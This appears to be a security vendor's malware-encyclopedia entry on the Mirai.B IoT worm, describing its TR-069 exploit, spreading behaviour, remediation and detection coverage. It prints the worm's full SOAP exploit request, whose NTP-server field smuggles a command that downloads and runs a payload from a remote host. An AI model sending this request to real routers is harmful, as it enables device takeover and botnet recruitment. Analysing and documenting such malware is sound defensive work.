Linux/Mirai.B!worm
Analysis
Linux/Mirai.B!worm is a bot which runs on Linux distributions on which busybox is available. It particularly targets IoT devices.
Its well known variant, Linux/Mirai.A!worm, is known to have caused DDoS of several companies and websites. So far, Linux/Mirai.B!worm is said to have affected a German operator.
The malware exploits a known vulnerability in the TR-069 configuration protocol.
The TR-069 protocol is used to manage routers and modems.
With TR-069, you can:
- Get information on the router or modem
- Run DSL diagnostics
- Adjust time
- ...
Linux/Mirai.B!worm exploits this vulnerability and crafts a special request to configure a new NTP server, but instead of providing the name of a valid NTP server, it provides shell code that downloads a malicious payload from a remote server. For example:
<?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body> </SOAP-ENV:Envelope>In that case, the malicious sample sets the new NTP server to
`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`This means it goes to tmp directory, downloads a malicious payload from a website named l.ocalhost.host (note this is different from localhost - the server does not resolve any longer), the malicious payload is named 2. This program is set as executable, and run.
An infected device does the following:
- Scan devices for open port 7547 (that's the port for TR-069). If it is open, attempt to infect by posting the SOAP request we displayed above.
- Block port 7547 to prevent re-infection. This is done by a simple iptables command:
busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
- Block telnet as well
busybox killall -9 telnetd
Recommended Action
To cure the device:
- Reboot the device. The malware does not persist after reboot.
- Update the device's firmware (if possible) so that it is no longer vulnerable
Telemetry
Detection Availability
FortiClient | |
---|---|
Extreme | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2019-04-02 | 67.50600 | Sig Updated |